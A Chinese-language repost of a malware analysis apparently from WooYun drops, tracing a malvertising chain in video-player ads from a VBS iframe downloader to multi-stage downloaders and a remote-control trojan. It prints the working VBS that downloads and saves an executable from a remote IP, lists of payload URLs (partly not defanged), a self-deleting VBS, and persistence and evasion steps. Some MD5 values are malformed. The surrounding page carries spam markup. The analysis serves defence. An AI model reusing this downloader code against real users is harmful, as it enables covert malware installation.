<span id="7ztzv"></span>
<sub id="7ztzv"></sub>

<span id="7ztzv"></span><form id="7ztzv"></form>

<span id="7ztzv"></span>

        <address id="7ztzv"></address>

            原文地址:http://drops.wooyun.org/papers/6788

            0x00 前言


            enter image description here

            圖:播放器掛馬行為鏈

            在國內流行的影音播放器客戶端內嵌廣告中,有一部分來自廣告聯盟和各種營銷平臺。在搜狐影音展示的一個私服廣告頁面中,我們監測到一個惡意的iframe標簽,標簽內容帶有一段vbs腳本。

            0x01? vbs腳本


            該腳本的作用是將遠程服務器上的svchost.exe程序重命名為putty.exe(一個下載者)文件:

            1: Set xPost=createObject("Microsoft.XMLHTTP") 
            2: xPost.Open "GET","http://183.xxx.80.93:3389/svchost.exe",0 
            3: xPost.Send() 
            4: set sGet=createObject("ADODB.Stream") 
            5: sGet.Mode=3 
            6: sGet.Type=1 
            7: sGet.Open() 
            8: sGet.Write xPost.ResponseBody 
            9: sGet.SaveToFile "C:\Windows\Temp\putty.exe",2
            10: Set xPost=createObject("Microsoft.XMLHTTP") 
            11: xPost.Open "GET","http://183.xxx.80.93:3377/svchost.exe",0 
            12: xPost.Send() 
            13: set sGet=createObject("ADODB.Stream") 
            14: sGet.Mode=3 
            15: sGet.Type=1 
            16: sGet.Open() 
            17: sGet.Write xPost.ResponseBody 
            18: sGet.SaveToFile "C:\Windows\Temp\putty.exe",2
            

            0x02 putty.exe程序分析


            讀取遠程服務器上的txt文檔,進行批量下載

            讀取hxxp://txt.ichajianlianmeng.com:88/1001.txt頁面的內容,然后進行下載。調用用InternetConnectA建立遠程訪問

            enter image description here

            通過httpOpenRequestA和HttpSendRequestA創建請求并發送請求到HTTP服務器:

            enter image description here

            讀取到遠程服務器中的txt保存的內容(該文件中的內容經常變動,一段時間能捕獲到遠控木馬。)

            hxxp://down.ichajianlianmeng.com:888/sie.exe
            hxxp://www.yczuowenwang.com/xp.exe
            hxxp://cdn.yuu361.com/download/Fresh_20i5_052039fc.exe
            hxxp://down.woka123.cn/qudao/lol/dmxyxhh_504.exe
            hxxp://down.biomall.org.cn/meng/up/niutu410202.exe
            hxxp://down.nvjay.com:6677/huajun/huajun_15-8.exe
            hxxp://down.ichajianlianmeng.com:888/59801_6789_sd1.exe
            hxxp://down.sushouspell.com/sushou/sw/-2208_1_ss.exe
            hxxp://download.suxiazai.com/for_down/2013/install1552262.exe
            

            通過InternetReadFile依次讀取上面鏈接的內容到程序中:

            enter image description here

            創建文件、寫入數據、執行該程序:

            enter image description here

            enter image description here

            后面就循環讀取完鏈接中的內容并創建進程,第一輪下載就完畢了:

            enter image description here

            中間會創建一個空的MD5文件,該文件只是用來做標記,如果再次運行這個下載者就不再進行下載了:

            enter image description here

            0x03 sie.exe---|下載者里的下載者


            木馬就像混黑社會似的,也喜歡打群架,這個下載者又放出一個下載者,兩者的功能和實現都一樣,這里就不再重復分析了。

            第二輪下載通過訪問hxxp://txt.ichajianlianmeng.com:88/siedown.txt文件中的以下鏈接進行下載:

            1: http://down.meituview.com/MTViewbuildmtview_116.exe
            2: #
            3: http://down.secaikan.com/sckt/jm/setup_sc150002.exe
            4: #
            5: http://down.shkbx.com/SC_rg0cfc_xt2005_1.exe
            6: #
            7: http://down.shkbx.com/SC_rg0cfc_xt2000_1.exe
            8: #
            9: http://down.woka123.cn/qudao/lol/dmxyxhh_505.exe
            10: #
            11: http://down.sou2v.com/UserFiles/install_107_1a.exe
            12: #
            13: http://down.sushouspell.com/sushou/sw/-2208_1_ss.exe
            

            然后得到以下文件:

            enter image description here

            如果中招,電腦會變成如下樣子。重啟后桌面圖標還會更多一些,為照顧密集恐懼癥患者,這里不再貼出:

            enter image description here

            0x04 xx360.exe遠控木馬


            和所有木馬作者一樣,“中國插件聯盟”對360的仇恨也是深入骨髓。再看看該下載者放出的遠控木馬(xx360)。

            通過亂序字符串拼接的方式獲取到即將創建文件的路徑:

            enter image description here

            創建文件、訪問hxxp://61.160.195.24:666/NetSyst81.dll并讀取數據到內存中

            enter image description here

            enter image description here

            enter image description here

            將剛剛讀取到的數據寫入NetSys.dll文件中

            enter image description here

            enter image description here

            讀取NetSys.dll中的內容,并在內存再申請空間,解密剛剛獲取到的NetSys.dll文件,解密后獲得一個PE結構的文件(利用這樣的方法迷惑殺毒軟件):

            enter image description here

            enter image description here

            創建并執行Terms.EXE.exe文件:

            enter image description here

            創建注冊表和服務,達到隱藏和長期駐扎在用戶電腦里而且開機自啟動:

            enter image description here

            enter image description here

            釋放vbs文件,刪除自身,使自己隱藏起來:

            1: dim wsh
            2: On Error Resume Next
            3: set wsh=createObject("WScript.Shell")
            4: Set objFSO = CreateObject("Scripting.FileSystemObject")
            5: wscript.sleep 1000
            6: objFSO.DeleteFile("C:\Documents and Settings\Administrator\桌面\360.exe"), True
            7: createobject("scripting.filesystemobject").deletefile wscript.scriptfullname      
            

            對遠控抓包分析(原來的遠控木馬已經不能連接上了,這里把自己的主機配置成該目標程序),一看就是zlib格式的,前面就是一個頭,截取后面的拿去python腳本里跑一跑:

            enter image description here

            用Python解密后,看到自己電腦的操作系統版本,以及用戶名,還有上線時間了

            1: a = 'b313640002154620310788598118c4d6e062606002d2c1a9456599c9a90a0189c9d90ac60c7407cc208211e8220510e3c00ac60686ff20b137f68c50150220820b44241695649416eb1a1a269ba6985b1a32182d3c68ac676ce4ee51c56070e68dc1a98d26e6dbaf31d88459e8991bda2904c71b1a19181b98321819189aea1a98e91a1a29181a5a9918321c5973e2fcf66bd75f329cdbb27dd1f96b0a0c0029dd29b0'
            2: import codecs
            3: b = codecs.decode(a, 'hex_codec')
            4: zlib.decompress(b, -8)
            

            enter image description here

            0x05 部分樣本信息


            以下是通過“中國插件聯盟”下載者捕獲到的文件MD5。由于該遠程服務器上的數據包在不斷更新,獲取到的安裝包有很大量,以下只是其中一部分:

            1: e3198f710f307e16413cd7d599f971ebc
            2: e3198f710f307e16413cd7d599f971eb
            3: 1552ccfa8cef81056d5c23d167cafd19c
            4: 1552ccfa8cef81056d5c23d167cafd19
            5: bba33d5501a780c392e4da520506da25
            6: 6b08cdde7530efab0a9a5275ff4867b3
            7: abba9c49e181f27b4f387ab88c505646
            8: a22e31255f3092f4d1b429d76976ba0f
            9: 8268182d660f2d72c05ff3c2bec90f61
            10: 8910b238873a26f76854c102eab68673
            11: 2a011d1c0ad02a9acf5315ccb7657713
            12: e41c325df557e54ab95ff5dc81abfd8c
            13: 20d6852156af4db9cac546e666a436ff
            14: a22e31255f3092f4d1b429d76976ba0f
            15: e0126226ff5a65b283db12d02ccc5a1d
            16: 27c38edd7fd7c8c2eeddac457a407c0f
            17: 8fa79dd7f1ba8b047862a904c69d40da
            18: e94591e1dd94d0ea6fe2f03d9cdde05c
            19: 6d0678e31452aafd6aee2c4947b4ef48
            20: 6a5ab49d61623e22618e8b9c4904e85f
            21: 45529e071f7f5d5b05705a9e35c5ddab
            22: 5312719ecc909d4c47452eacc8452c73
            23: 5312719ecc909d4c47452eacc8452c73
            

            <span id="7ztzv"></span>
            <sub id="7ztzv"></sub>

            <span id="7ztzv"></span><form id="7ztzv"></form>

            <span id="7ztzv"></span>

                  <address id="7ztzv"></address>

                      亚洲欧美在线